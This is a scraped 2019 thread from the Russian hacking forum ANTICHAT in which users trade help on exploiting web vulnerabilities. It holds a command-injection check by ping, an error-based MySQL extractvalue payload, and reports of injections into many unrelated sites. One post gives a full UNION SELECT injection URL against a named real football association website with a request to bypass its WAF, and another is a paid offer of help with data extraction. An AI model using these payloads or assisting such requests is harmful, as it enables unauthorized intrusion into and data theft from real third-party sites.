HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.10.2019, 18:25
fandor9
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
С нами: 3943766

Репутация: 47


По умолчанию

Цитата:
Сообщение от Baskin-Robbins  

Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера.
Стандартом ведь ни на винде, ни на линуксах пинги не логируются, или я ошибаюсь?

Цитата:
Сообщение от BabaDook  

Тогда можешь выполнять системные команды. и сразу получить шелл. даже заливать ничего не надо
так у него и так сразу системная шелл вылазит

Цитата:
Сообщение от noppathee  
 
Ответить с цитированием

  #2  
Старый 13.10.2019, 01:42
Baskin-Robbins
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
С нами: 4033046

Репутация: 212
По умолчанию

Цитата:
Сообщение от BabaDook  

нам не надо получать вывод команд.
Визуализируя всё это дело человеку проще будет, сложно учиться когда не видишь и не особо понимаешь что происходит

Цитата:
Сообщение от BabaDook  

Есть возможность получить шелл, и кстати вывод команд тоже можно получить
По линку есть материал на эту тему

Цитата:
Сообщение от fandor9  

Стандартом ведь ни на винде, ни на линуксах пинги не логируются, или я ошибаюсь?
Хорошо что заметил, еще бы линк добавить

/threads/434712/

Тут впринципе весь ответ сводится к ссылке на одну тему из которой становится ясно что делать дальше
 
Ответить с цитированием

  #3  
Старый 13.10.2019, 01:50
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от Baskin-Robbins  

Визуализируя всё это дело человеку проще будет, сложно учиться когда не видишь и не особо понимаешь что происходит
/threads/434712/
Согласен. самое простое конечно пинг на свой хост. Дальше от этого уже плясать.
 
Ответить с цитированием

  #4  
Старый 13.10.2019, 14:06
fandor9
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
С нами: 3943766

Репутация: 47


По умолчанию

Цитата:
Сообщение от Baskin-Robbins  

По линку есть материал на эту тему
Хорошо что заметил, еще бы линк добавить
/threads/434712/
Тут впринципе весь ответ сводится к ссылке на одну тему из которой становится ясно что делать дальше
В принципе на линуксе всё достаточно просто

Код:
iptables -I INPUT -p icmp --icmp-type 8 -m state  --state NEW,ESTABLISHED,RELATED -j LOG --log-level=1 --log-prefix "Ping Request "
и затем в консоли включаем

Код:
dmesg --follow
и там уже видим идёт ли пинг и от какого адреса (SRC=). Но опять-тако зависит от того, как настроена система, может быть что пинги до этого сбрасывает раутер.

На винде это немного сложнее, нужно сначала сконфигурировать брандмауэр винды и потом уже смотреть логи брандмауэра.
 
Ответить с цитированием

  #5  
Старый 28.10.2019, 11:12
to the moon
Новичок
Регистрация: 22.12.2018
Сообщений: 8
С нами: 3891926

Репутация: 3
По умолчанию

Попалась ситуация при раскрутке SQL иньекта, из которой не могу выбраться, буду признателен, если кто что подскажет.

Имеем вот такой MySql запрос:

Код:
SELECT test_value from table
where testmemo LIKE \'%'.$_POST['SQL'].'%\'
ORDER BY LOCATE(\''.$_POST['SQL'].'\',index);
Фильтруются символы # и * (без разницы, сырые, или в urlencode).

Комментарий -- 1 не срабатывает, хотя и не фильтруется. Кавычка ` в качестве комментария тоже не работает (про нулл байт вообще молчу).

Вставить например error-based вектор, а всё остальное закомментировать не получается, следовательно остается корректно достроить существующий запрос, но вот тут и начинаются проблемы.

Наш иньект попадает в запрос сразу в двух местах, в одном месте он обрамлен одинарными кавычками, а во втором случае ещё и взят в скобки.

И как в данной ситуации выкрутиться я не могу сообразить.
 
Ответить с цитированием

  #6  
Старый 28.10.2019, 11:25
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от to the moon  
to the moon said:

Вставить например error-based вектор, а всё остальное закомментировать не получается
Код:
' AND extractvalue(1,concat(0x3a,(select @@version)))-'
 
Ответить с цитированием

  #7  
Старый 28.10.2019, 14:07
2dd
Новичок
Регистрация: 09.08.2011
Сообщений: 9
С нами: 7768406

Репутация: 0
По умолчанию

Уже не в первый раз встречаюсь с ситуацией, когда раскрутив MySQL иньект, при попытке взаимодействия с существующей таблицей, SQL иньект пропадает, и при этом если указать несуществующую таблицу, то всё ок.

Т.е. при запросе select count(*) from not_exists_table (который следует как подзапрос в error или union based векторах), если таблицы нет, то будет стандартная ошибка Table 'not_exists_table' doesn't exist

Если же указать реально существующую, то как будто SQL фильтруется. И так на очень многих сайтах. Сайты разные, и друг с другом никак не взаимосвязаны.

Если кто знает, как решить эту беду, подскажите.
 
Ответить с цитированием

  #8  
Старый 28.10.2019, 14:27
Estet
Познающий
Регистрация: 30.08.2016
Сообщений: 34
С нами: 5107286

Репутация: 0
По умолчанию

Напишу сюда.

ребята, кто шарит в sql inj, возможно кто-то желает оказывать персональную помощь, по различным вопросам в джабер за оплату?

Вопросы в основном по WAF и извлечению данных. (допустим почему выдает 500 ошибку или 400, к примеру)

Как заливать шелы, получать права и прочее такое не нужно.

Я мало в этом шарю, пользуюсь sqlmap и burp (automated scan), поэтому объяснять нужно как чайнику доступным языком.

Именно поэтому готов платить за помощь.

Так же сотрудничество на перспективу, я щедрый, с теми кто со мной честен и добр)))))

У меня не совсем тривиальная ситуация, объясню в джабере.

Пишите : 7jon7doe@cluster.sx

Много вашего времени не займу, в день может пара тройка вопросов!

Чуть дополню, мне скорее подойдет человек, который шарит в коде и чуть в скуле. На какие то вопросы ты мне ответишь, в каких-то вместе будем разбираться. Я это к тому, что врятли опытному хакеру нужна будет мелочь))
 
Ответить с цитированием

  #9  
Старый 30.10.2019, 06:52
BenderMR
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами: 3801206

Репутация: 10
По умолчанию

помогите раздекодить строку. Проверяю и API и вся инфа с формы отправляется в таком виде

Код:
5d000008007200000000000000003d8888865474ae3953ed45d37f263bd75edbffa14070ca8100680ed91a004e8f482ba622d6df8a57cf5800cbf802a3eaa2e536c0c7f9c0c3d50668e4f56367357f70f75394537e88edff509845cb5dba03414af6cefedcc2c0c0fe453ca5ff57f3b216a833480a6dc4
Похоже на hex, но когда пробую декодить выдает какие то непонятные символы. Сайт китайский, может дело в этом. И как в таком случае с этим работать, потому что ни берпом, ни онлайн не вышло
 
Ответить с цитированием

  #10  
Старый 02.11.2019, 18:03
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

Помогите ваф обойти

Код:
https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,34,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.